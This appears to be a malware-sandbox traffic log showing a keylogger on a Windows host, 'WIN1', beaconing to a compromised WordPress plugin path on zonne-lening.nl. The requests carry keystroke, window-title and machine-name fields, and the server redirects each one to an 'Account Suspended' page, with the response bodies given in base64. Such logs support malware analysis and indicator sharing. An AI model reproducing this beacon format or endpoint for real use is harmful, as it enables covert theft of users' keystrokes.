Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2016 04:54:43 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
44 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20PM text/html post.php 302 Found HTML 379.0 B 01/22/67 09:26:51
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9ODo1
NCUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
fffcd2b1cabb3349881068a66a7be970b6e9b2f76879b1c623c6dddad30b8dd9
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Sat, 03 Dec 2016 04:54:44 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
45 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 01/22/67 10:06:53
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sat, 03 Dec 2016 04:54:44 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
46 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20PM text/html post.php 302 Found HTML 345.0 B 01/25/67 22:34:52
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT04OjU1JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
c7f183e238bc8ab19749557d18d2b8b402d6681a1995f03ea205ebe1d8f81dba
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Sat, 03 Dec 2016 04:55:14 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
47 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=8:55%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 01/25/67 23:22:04
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
